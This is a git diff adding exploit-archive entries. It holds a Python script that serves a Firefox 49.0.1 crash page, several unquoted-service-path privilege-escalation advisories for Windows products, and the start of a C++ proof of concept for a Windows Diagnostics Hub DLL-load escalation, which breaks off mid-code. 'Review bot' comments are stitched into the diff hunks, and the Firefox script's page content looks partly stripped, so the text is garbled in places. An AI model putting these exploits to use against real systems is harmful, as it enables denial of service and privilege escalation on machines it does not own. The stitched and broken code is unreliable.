@@ -0,0 +1,147 @@ + + +''' +#Hi guys +#Title: Firefox 49.0.1 crash Denial of Service +#Date: 15 Oct 2016 +#Author: sultan albalawi +#video: https://www.facebook.com/pentest3/videos/vb.100012552940568/199310163830747/?type=2&theater +#Tested on:win7 +#Open link in firefox +#Double click on the Click You will see the report that there are crach + +#thanks +......................................................................... +''' + +from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer +import subprocess,string +host='192.168.100.3' +port=6060 +ban= '\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x5c\x20\x20\x20\x2d\x20\x20' +ban+='\x2d\x20\x20\x2d\x20\x3c\x73\x65\x72\x76\x65\x72\x3e\x20\x20\x2d' +ban+='\x20\x5c\x2d\x2d\x2d\x3c\x20\x2d\x20\x2d\x20\x20\x2d\x20\x2d\x20' +ban+='\x20\x2d\x20\x20\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20' +ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20' +ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20' +ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x0d\x0a\x20\x20\x20' +ban+='\x20\x20\x20\x20\x7c\x20\x20\x20\x20\x44\x6f\x63\x5f\x41\x74\x74' +ban+='\x61\x63\x6b\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20' +ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a' +ban+='\x2a\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x20\x20\x20' +ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20' +ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20' +ban+='\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20' +ban+='\x20\x20\x20\x76\x20\x20\x20\x20\x20\x20\x20\x20\x60\x20\x60\x2e' +ban+='\x20\x20\x20\x20\x2c\x3b\x27\x20\x20\x20\x20\x20\x20\x20\x20\x20' +ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x41\x70\x50' +ban+='\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20' +ban+='\x20\x20\x20\x20\x20\x20\x60\x2e\x20\x20\x2c\x27\x2f\x20\x2e\x27' 
+ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20' +ban+='\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d' +ban+='\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20' +ban+='\x20\x20\x60\x2e\x20\x58\x20\x2f\x2e\x27\x20\x20\x20\x20\x20\x20' +ban+='\x20\x20\x20\x20\x20\x20\x20\x2a\x20\x20\x20\x20\x20\x2a\x2a\x2a' +ban+='\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20' +ban+='\x20\x20\x20\x2e\x2d\x3b\x2d\x2d\x27\x27\x2d\x2d\x2e\x5f\x60\x20' +ban+='\x60\x20\x28\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20' +ban+='\x20\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x0d' +ban+='\x0a\x20\x20\x20\x20\x20\x2e\x27\x20\x20\x20\x20\x20\x20\x20\x20' +ban+='\x20\x20\x20\x2f\x20\x20\x20\x20\x27\x20\x20\x20\x20\x20\x20\x20' +ban+='\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20' +ban+='\x20\x20\x20\x7c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x0d\x0a\x20' +ban+='\x20\x20\x20\x20\x3b\x53\x65\x63\x75\x72\x69\x74\x79\x60\x20\x20' +ban+='\x27\x20\x30\x20\x20\x30\x20\x27\x20\x20\x20\x20\x20\x20\x20\x20' +ban+='\x20\x2a\x2a\x2a\x4e\x45\x54\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20' +ban+='\x20\x7c\x0d\x0a\x20\x20\x20\x20\x2c\x20\x20\x20\x20\x20\x20\x20' +ban+='\x2c\x20\x20\x20\x20\x27\x20\x20\x7c\x20\x20\x27\x20\x20\x20\x20' +ban+='\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x20' +ban+='\x20\x20\x20\x20\x20\x20\x5e\x0d\x0a\x20\x2c\x2e\x20\x7c\x20\x20' +ban+='\x20\x20\x20\x20\x20\x27\x20\x20\x20\x20\x20\x60\x2e\x5f\x2e\x27' +ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c' +ban+='\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x5e\x2d\x2d\x2d\x5e\x20\x20\x20\x20' +ban+='\x20\x20\x20\x20\x20\x20\x2f\x0d\x0a\x20\x3a\x20\x20\x2e\x20\x60' +ban+='\x20\x20\x3b\x20\x20\x20\x60\x20\x20\x60\x20\x2d\x2d\x2c\x2e\x2e' +ban+='\x5f\x3b\x2d\x2d\x2d\x3e\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c' +ban+='\x20\x20\x20\x20\x20\x20\x20\x27\x2e\x27\x2e\x27\x5f\x5f\x5f\x5f' 
+ban+='\x5f\x5f\x5f\x5f\x20\x2a\x0d\x0a\x20\x20\x27\x20\x60\x20\x20\x20' +ban+='\x20\x2c\x20\x20\x20\x29\x20\x20\x20\x2e\x27\x20\x20\x20\x20\x20' +ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x5e\x20' +ban+='\x20\x20\x20\x20\x20\x20\x20\x7c\x5f\x7c\x20\x46\x69\x72\x65\x77' +ban+='\x61\x6c\x6c\x20\x29\x0d\x0a\x20\x20\x20\x20\x20\x60\x2e\x5f\x20' +ban+='\x2c\x20\x20\x27\x20\x20\x20\x2f\x5f\x20\x20\x20\x20\x20\x20\x20' +ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x20' +ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x7c\x20\x20\x20\x20' +ban+='\x7c\x7c\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3b\x20\x2c\x27' +ban+='\x27\x2d\x2c\x3b\x27\x20\x60\x60\x2d\x5f\x5f\x5f\x5f\x5f\x5f\x5f' +ban+='\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x7c\x0d\x0a\x20\x20\x20' +ban+='\x20\x20\x20\x20\x20\x20\x60\x60\x2d\x2e\x2e\x5f\x5f\x60\x60\x2d' +ban+='\x2d\x60\x20\x20\x20\x20\x20\x20\x20\x69\x70\x73\x20\x20\x20\x20' +ban+='\x20\x20\x20\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x5e' +ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2f\x0d\x0a\x20' +ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20' +ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20' +ban+='\x20\x20\x20\x20\x20\x20\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x27' +ban+='\x2e\x20\x5f\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2a\x0d\x0a\x20' +ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20' +ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20' +ban+='\x20\x20\x20\x20\x20\x20\x20\x2d\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x20' +ban+='\x7c\x5f\x20\x20\x49\x50\x53\x20\x20\x20\x20\x20\x29\x0d\x0a\x20' +ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20' +ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20' +ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20' +ban+='\x20\x20\x20\x20\x7c\x7c\x20\x20\x20\x20\x20\x7c\x7c\x0d\x0a\x20' +ban+='\n' 
+ban+='\x53\x75\x6c\x74\x61\x6e\x5f\x41\x6c\x62\x61\x6c\x61\x77\x69\n' +ban+='\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x66\x61\x63\x65\x62\x6f\x6f\x6b\x2e\x63\x6f\x6d\x2f\x70\x65\x6e\x74\x65\x73\x74\x33\n' +print ban +print "please wait ...." +i=1 +while i <= 4120: + i+=1 + ban+=string.ascii_uppercase*250 + ban=ban +class Req(BaseHTTPRequestHandler): + def do_GET(self): + self.send_response(200) + self.send_header('Content-type','text/html') + self.end_headers() + self.wfile.write(''' + + Firefox 49.0.1 Vulnerability +
+

Firefox 49.0.1 Vulnerability

+

\x41\x75\x74\x68\x6f\x72\x3a\x20\x53\x75\x6c\x74\x61\x6e\x2d\x61\x6c\x62\x61\x6c\x61\x77\x69

+

\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x66\x61\x63\x65\x62\x6f\x6f\x6b\x2e\x63\x6f\x6d\x2f\x70\x65\x6e\x74\x65\x73\x74\x33\n

+ '''+''+''' + 'helo firefox'CLICK + ''') +class runHTTP(HTTPServer): + def __init__(self,host,port): + ipadd=(host,port) + HTTPServer.__init__(self,ipadd,Req) +def createfile(): + global filecreate + filecreate = "Firefox.dat" + open(filecreate, "wb").write(ban) + print filecreate +createfile() +def start(): + global filecreate + ser=runHTTP(host,port) + print "http://{}:{}/{}".format(host,port,filecreate) + ser.serve_forever() +start() + diff --git a/platforms/windows/local/40535.txt b/platforms/windows/local/40535.txt new file mode 100755 index 000000000..ba4ba4097 --- /dev/null +++ b/platforms/windows/local/40535.txt @@ -0,0 +1,32 @@ +######################################################################### +# Exploit Title: Wondershare PDFelement Unquoted Service Path Privilege +Escalation +# Date: 10/14/2016 +# Author: Saeed Hasanzadeh (Net.Hun73r) +# Vendor Homepage: https://www.wondershare.com/ +# Software Link: +http://download.wondershare.com/inst/pdfelement_setup_full1042.exe +#version : 5.2.9 +# Tested on: Windows 7 +########################################################################## + +Wondershare PDFelement installs a service with an unquoted service path +To properly exploit this vulnerability, +the local attacker must insert an executable file in the path of the +service. +Upon service restart or system reboot, the malicious code will be run +with elevated privileges. +------------------------------------------- +C:\>sc qc WsAppService +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: WsAppService + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\Wondershare\WAF\2.2.3.2\WsAppService.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Wondershare Application Framework Service + DEPENDENCIES : RPCSS + SERVICE_START_NAME : LocalSystem diff --git a/platforms/windows/local/40538.txt b/platforms/windows/local/40538.txt new file mode 100755 index 000000000..d4fc0cfd6 
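Review bot: `open(filecreate, "wb").write(ban)` in createfile() never closes the file; use `with open(filecreate, "wb") as f: f.write(ban)`. The `while i <= 4120` loop appends `string.ascii_uppercase*250` 4120 times with quadratic string concatenation and ends each iteration with the no-op `ban=ban`; a single `ban += string.ascii_uppercase * (250 * 4120)` produces the same buffer. `import subprocess` is unused and `BaseHTTPServer` is Python 2 only, which the header should state. Also, as far as the visible handler shows, `do_GET` ignores `self.path` and returns the same HTML for every request, so the Firefox.dat file that createfile() writes and start() prints a URL for is never actually served by this server.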
--- /dev/null +++ b/platforms/windows/local/40538.txt @@ -0,0 +1,43 @@ +# Exploit Title: Graylog Collector Service Path Privilege Escalation +# Date: 10/14/2016 +# Exploit Author: Joey Lane +# Software Link: https://github.com/Graylog2/collector +# Version: 0.4.2 +# Tested on: Windows Server 2012 R2 + +Graylog Collector installs as a service with an unquoted service path. If +the user installs this service in a directory containing a space, this will +create a privilege escalation vulnerability. To properly exploit this +vulnerability, a local attacker can insert an executable file in the path +of the service. Rebooting the system or restarting the service will run +the malicious executable with elevated privileges. + + +This was tested on version 0.4.2, but may affect other versions as well. + + +--------------------------------------------------------------------------- + +C:\sc qc GraylogCollector +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: GraylogCollector + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\graylog collector\bin\windows\graylog-collector-service-x86.exe //RS//GraylogCollector + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Graylog Collector (GraylogCollector) + DEPENDENCIES : Tcpip + : Afd + SERVICE_START_NAME : LocalSystem + +--------------------------------------------------------------------------- + + +EXAMPLE: + +Using the BINARY_PATH_NAME listed above as an example, an executable named +"graylog.exe" could be placed in "C:\", and it would be executed as the +Local System user next time the service was restarted. diff --git a/platforms/windows/local/40539.txt b/platforms/windows/local/40539.txt new file mode 100755 index 000000000..6ff977a3e --- /dev/null +++ b/platforms/windows/local/40539.txt 
@@ -0,0 +1,32 @@
+#########################################################################
+# Exploit Title: NETGATE Registry Cleaner Unquoted Service Path
+Privilege Escalation
+# Date: 15/10/2016
+# Author: Amir.ght
+# Vendor Homepage: http://www.netgate.sk/
+# Software Link:
+http://www.netgate.sk/download/download.php?id=4
+#version : build 16.0.205 (Latest)
+# Tested on: Windows 7
+##########################################################################
+
+NETGATE Registry Cleaner installs a service with an unquoted service path
+To properly exploit this vulnerability,
+the local attacker must insert an executable file in the path of the service.
+Upon service restart or system reboot, the malicious code will be run
+with elevated privileges.
+-------------------------------------------
+C:\>sc qc NGRegClnSrv
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: NGRegClnSrv
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files\NETGATE\Registry
+Cleaner\RegistryCleanerSrv.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : NETGATE Registry Cleaner Service
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
diff --git a/platforms/windows/local/40540.txt b/platforms/windows/local/40540.txt
new file mode 100755
index 000000000..fc1216890
--- /dev/null
+++ b/platforms/windows/local/40540.txt
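Review bot: The hijack locations implied by `C:\Program Files\NETGATE\Registry Cleaner\RegistryCleanerSrv.exe` are never enumerated, and they decide whether this is exploitable: the service manager would try `C:\Program.exe` and then `C:\Program Files\NETGATE\Registry.exe`, and both the drive root (for file creation) and `C:\Program Files\NETGATE` are normally Administrators-only under default ACLs, so the advisory should include an `icacls "C:\Program Files\NETGATE"` dump proving a non-admin write grant or state the dependency on a misconfigured ACL. The BINARY_PATH_NAME is also wrapped mid-path (`Registry` / `Cleaner\RegistryCleanerSrv.exe`), which in a plain-text advisory reads as a path containing a newline; re-join it onto one line together with the wrapped title and Software Link. A remediation line would round it out: `sc config NGRegClnSrv binPath= "\"C:\Program Files\NETGATE\Registry Cleaner\RegistryCleanerSrv.exe\""`.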
@@ -0,0 +1,47 @@
+#########################################################################
+# Exploit Title: NETGATE AMITI Antivirus Unquoted Service Path
+Privilege Escalation
+# Date: 15/10/2016
+# Author: Amir.ght
+# Vendor Homepage: http://www.netgate.sk/
+# Software Link:
+http://www.netgate.sk/download/download.php?id=11
+#version : build 23.0.305 (Latest)
+# Tested on: Windows 7
+##########################################################################
+
+AMITI Antivirus installs two service with an unquoted service path
+To properly exploit this vulnerability,
+the local attacker must insert an executable file in the path of the service.
+Upon service restart or system reboot, the malicious code will be run
+with elevated privileges.
+-------------------------------------------
+C:\>sc qc AmitiAvSrv
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: AmitiAvSrv
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files\NETGATE\Amiti
+Antivirus\AmitiAntivirusSrv.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : Amiti Antivirus Engine Service
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+C:\>sc qc AmitiAvHealth
+[SC] QueryServiceConfig SUCCESS
+----------------------------------------------------
+SERVICE_NAME: AmitiAvHealth
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files\NETGATE\Amiti
+Antivirus\AmitiAntivirusHealth.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : Amiti Antivirus Health Check
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
diff --git a/platforms/windows/local/40541.txt b/platforms/windows/local/40541.txt
new file mode 100755
index 000000000..f4f1363f9
--- /dev/null
+++ b/platforms/windows/local/40541.txt
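Review bot: Both services resolve through the same unquoted directory, so the advisory should say that a single planted `C:\Program Files\NETGATE\Amiti.exe` (or `C:\Program.exe`) covers `AmitiAvSrv` and `AmitiAvHealth` alike and would be started as LocalSystem by each of them; that is the consequence worth a sentence after `installs two service`, which should itself read `installs two services`. What is still missing is any evidence that `C:\Program Files\NETGATE` is writable by a non-administrator, which it normally is not under default ACLs, so either add an `icacls` dump or state that a relaxed ACL is required. The dashed separator sits after the second `[SC] QueryServiceConfig SUCCESS` instead of between the two `sc qc` dumps; moving it keeps the two outputs distinguishable.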
@@ -0,0 +1,31 @@
+#########################################################################
+# Exploit Title: NETGATE Data Backup Unquoted Service Path Privilege Escalation
+# Date: 15/10/2016
+# Author: Amir.ght
+# Vendor Homepage: http://www.netgate.sk/
+# Software Link:
+http://www.netgate.sk/download/download.php?id=5
+#version : build 3.0.605 (Latest)
+# Tested on: Windows 7
+##########################################################################
+
+NETGATE Data Backup installs a service with an unquoted service path
+To properly exploit this vulnerability,
+the local attacker must insert an executable file in the path of the service.
+Upon service restart or system reboot, the malicious code will be run
+with elevated privileges.
+-------------------------------------------
+C:\>sc qc NGDatBckpSrv
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: NGDatBckpSrv
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files\NETGATE\Data
+Backup\DataBackupSrv.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : NETGATE Data Backup Service
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
diff --git a/platforms/windows/local/40550.txt b/platforms/windows/local/40550.txt
new file mode 100755
index 000000000..797d6cf41
--- /dev/null
+++ b/platforms/windows/local/40550.txt
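Review bot: No remediation is given and the precondition is unstated; for `C:\Program Files\NETGATE\Data Backup\DataBackupSrv.exe` the candidates are `C:\Program.exe` and `C:\Program Files\NETGATE\Data.exe`, both in locations that are normally Administrators-only under default ACLs, so the write-up should either show an `icacls` dump with a non-admin write grant or say the bug is only exploitable where the install directory ACL has been relaxed. Add the fix as the vendor would apply it: `sc config NGDatBckpSrv binPath= "\"C:\Program Files\NETGATE\Data Backup\DataBackupSrv.exe\""`. The path is also wrapped across `Data` / `Backup\DataBackupSrv.exe`; re-join it so it is copy-pasteable.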
@@ -0,0 +1,45 @@
+#########################################################################
+# Exploit Title: Spy Emergency Unquoted Service Path Privilege Escalation
+# Date: 15/10/2016
+# Author: Amir.ght
+# Vendor Homepage: http://www.spy-emergency.com/
+# Software Link: http://www.spy-emergency.com/download/download.php?id=1
+#version : build 23.0.205 (Latest)
+# Tested on: Windows 7
+##########################################################################
+
+Spy Emergency installs two service with an unquoted service path
+To properly exploit this vulnerability,
+the local attacker must insert an executable file in the path of the service.
+Upon service restart or system reboot, the malicious code will be run
+with elevated privileges.
+-------------------------------------------
+C:\>sc qc SpyEmrgHealth
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: SpyEmrgHealth
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files\NETGATE\Spy
+Emergency\SpyEmergencyHealth.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : Spy Emergency Health Check
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+------------------------------------------------------------------
+C:\>sc qc SpyEmrgSrv
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: SpyEmrgSrv
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files\NETGATE\Spy
+Emergency\SpyEmergencySrv.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : Spy Emergency Engine Service
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
\ No newline at end of file
diff --git a/platforms/windows/local/40562.cpp b/platforms/windows/local/40562.cpp
new file mode 100755
index 000000000..62fd32c8f
--- /dev/null
+++ b/platforms/windows/local/40562.cpp
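Review bot: The file is committed without a trailing newline (`\ No newline at end of file`), unlike the other advisories in this batch, which means the next edit to it will show a spurious change on the last line; add the newline. Both dumps share `C:\Program Files\NETGATE\Spy Emergency\`, so a single planted `C:\Program Files\NETGATE\Spy.exe` (or `C:\Program.exe`) would be executed by `SpyEmrgHealth` and `SpyEmrgSrv` alike as LocalSystem; that is worth stating, together with the caveat that both locations are normally Administrators-only under default ACLs and the write-up shows no `icacls` evidence to the contrary. `installs two service` should read `installs two services`, and the wrapped paths (`Spy` / `Emergency\...`) should be re-joined onto single lines.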
@@ -0,0 +1,192 @@
+/*
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=887
+
+Windows: Diagnostics Hub DLL Load EoP
+Platform: Windows 10 10586, not tested 8.1 Update 2 or Windows 7
+Class: Elevation of Privilege
+
+Summary:
+The fix for CVE-2016-3231 is insufficient to prevent a normal user specifying an insecure agent path leading to arbitrary DLL loading at system privileges.
+
+Description:
+
+CVE-2016-3231 was an issue caused by passing a relative agent path name which allowed the DLL path loaded for the agent DLL to be redirected to another file. This seems to have been fixed and as far as I can tell this issue is no longer exploitable from a sandbox. However the problem is there’s an assumption that it’s not possible to write a file to the system32 directory, which technically is true but practically for this exploit false.
+
+As I’ve blogged about before, and also submitted bugs (for example MSRC-21233) a normal user can created named streams on directories as long as they have FILE_ADD_FILE access right to the directory. When you do this you create what looks from a path perspective to be in the parent. For example the system32\tasks folder is writable by a normal user, so you can copy a DLL to system32\tasks:abc.dll and when GetFullPathName is called the filename returned is tasks:abc.dll. When the GetValidAgentPath is called it checks if this file is in system32 by using GetFileAttributes, which succeeds and the service will proceed to load the file.
+
+On the fixing side of things, I can’t see an obvious reason why just checking for invalid path characters in the agent path wouldn’t be sufficient (and in fact would arguably have fixed the original bug as well). Of course I think it’s slightly dodgy that you’ll load any DLL from system32, even ones which aren’t agent DLLs. You’d have to find something which was somehow exploitable in a very short time window during DllMain but it might work.
+
+Also I wonder whether they’re any legitimate uses for named streams on NTFS directories? While it’s certainly out of scope perhaps they could only be created by admins? Or perhaps the access check shouldn’t be on the target directories but its parent directory where the effective file appears to be located.
+
+Proof of Concept:
+
+I’ve provided a PoC as a C++ source code file. You’ll also need a DLL to test load, I’ve not provided one of these but any should do, as long as it matches the bitness of the OS.
+
+1) Compile the C++ source code file.
+2) Execute the poc passing the path to the DLL you want to load in the service as a normal user.
+3) It should print that the DLL was loaded successfully.
+
+Expected Result:
+The loading of a DLL fails as the path is rejected.
+
+Observed Result:
+The DLL is loaded successfully.
+*/
+
+
+// ExploitCollector.cpp : Defines the entry point for the console application.
+//
+
+#include
+#include
+#include
+#include
+#include
+
+GUID CLSID_CollectorService =
+ { 0x42CBFAA7, 0xA4A7, 0x47BB,{ 0xB4, 0x22, 0xBD, 0x10, 0xE9, 0xD0, 0x27, 0x00, } };
+
+class __declspec(uuid("f23721ef-7205-4319-83a0-60078d3ca922")) ICollectionSession : public IUnknown {
+public:
+
+ virtual HRESULT __stdcall PostStringToListener(REFGUID, LPWSTR) = 0;
+ virtual HRESULT __stdcall PostBytesToListener() = 0;
+ virtual HRESULT __stdcall AddAgent(LPWSTR path, REFGUID) = 0;
+ //.rdata:0000000180035868 dq offset ? Start@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJPEAUtagVARIANT@@@Z; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::Start(tagVARIANT *)
+ //.rdata:0000000180035870 dq offset ? GetCurrentResult@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJFPEAUtagVARIANT@@@Z; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::GetCurrentResult(short, tagVARIANT *)
+ //.rdata:0000000180035878 dq offset ?
Pause@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJXZ; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::Pause(void)
+ //.rdata:0000000180035880 dq offset ? Resume@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJXZ; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::Resume(void)
+ //.rdata:0000000180035888 dq offset ? Stop@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJPEAUtagVARIANT@@@Z; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::Stop(tagVARIANT *)
+ //.rdata:0000000180035890 dq offset ? TriggerEvent@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJW4SessionEvent@@PEAUtagVARIANT@@11@Z; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::TriggerEvent(SessionEvent, tagVARIANT *, tagVARIANT *, tagVARIANT *)
+ //.rdata:0000000180035898 dq offset ? GetGraphDataUpdates@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJAEBU_GUID@@PEAUtagSAFEARRAY@@PEAUGraphDataUpdates@@@Z; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::GetGraphDataUpdates(_GUID const &, tagSAFEARRAY *, GraphDataUpdates *)
+ //.rdata:00000001800358A0 dq offset ? QueryState@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJPEAW4SessionState@@@Z; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::QueryState(SessionState *)
+ //.rdata:00000001800358A8 dq offset ? GetStatusChangeEventName@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJPEAPEAG@Z; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::GetStatusChangeEventName(ushort * *)
+ //.rdata:00000001800358B0 dq offset ? GetLastError@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJPEAJ@Z; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::GetLastError(long *)
+ //.rdata:00000001800358B8 dq offset ?
SetClientDelegate@EtwCollectionSession@StandardCollector@DiagnosticsHub@Mic
+};
+
+struct SessionConfiguration
+{
+ DWORD version; // Needs to be 1
+ DWORD a1; // Unknown
+ DWORD something; // Also unknown
+ DWORD monitor_pid;
+ GUID guid;
+ BSTR path; // Path to a valid directory
+ CHAR trailing[256];
+};
+
+class __declspec(uuid("7e912832-d5e1-4105-8ce1-9aadd30a3809")) IStandardCollectorClientDelegate : public IUnknown
+{
+};
+
+class __declspec(uuid("0d8af6b7-efd5-4f6d-a834-314740ab8caa")) IStandardCollectorService : public IUnknown
+{
+public:
+ virtual HRESULT __stdcall CreateSession(SessionConfiguration *, IStandardCollectorClientDelegate *, ICollectionSession **) = 0;
+ virtual HRESULT __stdcall GetSession(REFGUID, ICollectionSession **) = 0;
+ virtual HRESULT __stdcall DestroySession(REFGUID) = 0;
+ virtual HRESULT __stdcall DestroySessionAsync(REFGUID) = 0;
+ virtual HRESULT __stdcall AddLifetimeMonitorProcessIdForSession(REFGUID, int) = 0;
+};
+
+_COM_SMARTPTR_TYPEDEF(IStandardCollectorService, __uuidof(IStandardCollectorService));
+_COM_SMARTPTR_TYPEDEF(ICollectionSession, __uuidof(ICollectionSession));
+
+class CoInit
+{
+public:
+ CoInit() {
+ CoInitialize(nullptr);
+ }
+
+ ~CoInit() {
+ CoUninitialize();
+ }
+};
+
+void ThrowOnError(HRESULT hr)
+{
+ if (hr != 0)
+ {
+ throw _com_error(hr);
+ }
+}
+
+int wmain(int argc, wchar_t** argv)
+{
+ if (argc < 2)
+ {
+ printf("poc path\\to\\dll\n");
+ return 1;
+ }
+
+ CoInit coinit;
+ try
+ {
+ GUID name;
+ CoCreateGuid(&name);
+ LPOLESTR name_str;
+ StringFromIID(name, &name_str);
+
+ WCHAR random_name[MAX_PATH];
+ StringCchPrintf(random_name, MAX_PATH, L"tasks:%ls.dll", name_str);
+
+ WCHAR target[MAX_PATH];
